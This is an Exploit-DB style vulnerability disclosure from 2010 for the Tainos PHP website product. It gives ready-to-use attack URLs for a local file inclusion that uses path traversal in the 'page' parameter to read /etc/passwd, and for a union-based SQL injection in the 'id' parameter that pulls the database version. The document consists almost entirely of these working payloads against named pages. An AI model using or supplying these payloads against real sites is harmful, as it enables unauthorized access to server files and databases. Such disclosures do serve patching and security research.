Tainos - Multiple Vulnerabilities

EDB-ID:

12629

CVE:

N/A

Author:

XroGuE

Type:

webapps

Platform:

PHP

Published:

2010-05-16

=======================================================
Tainos Multiple Vulnerabilities
=======================================================
########################################
# Name: Tainos Multiple Vulnerabilities
# Vendor: www.tainos-webdesign.com
# Date: 2010/05/16
# Author: Ashiyane Digital Security Team
# Discovered: XroGuE
# Thanks to: Virangar,Ali.Eagle,Satanic2000,Ashiyane Members
# Contact: Xrogue_p3rsi4n_hack3r@Hotmail.com
########################################

########################################
[+] Local File Include Vulnerability:

[+] Vulnerability: www.Site.com/[path]/Page.php?page=[LFI]

[+] Example: http://[site]/index_offer.php?page=../../../../../../../../../../etc/passwd

[+] Example: http://[site]/nederlands/tours.php?page=../../../../../../../../../../etc/passwd

########################################

########################################
[+] SQL Injection Vulnerability:

[+] Vulnerability: /www.site.com/index.php?id=[SQLi]

[+] Example: http://[site]/index.php?id=-9999+union+all+select+1,2,@@version,4,5

########################################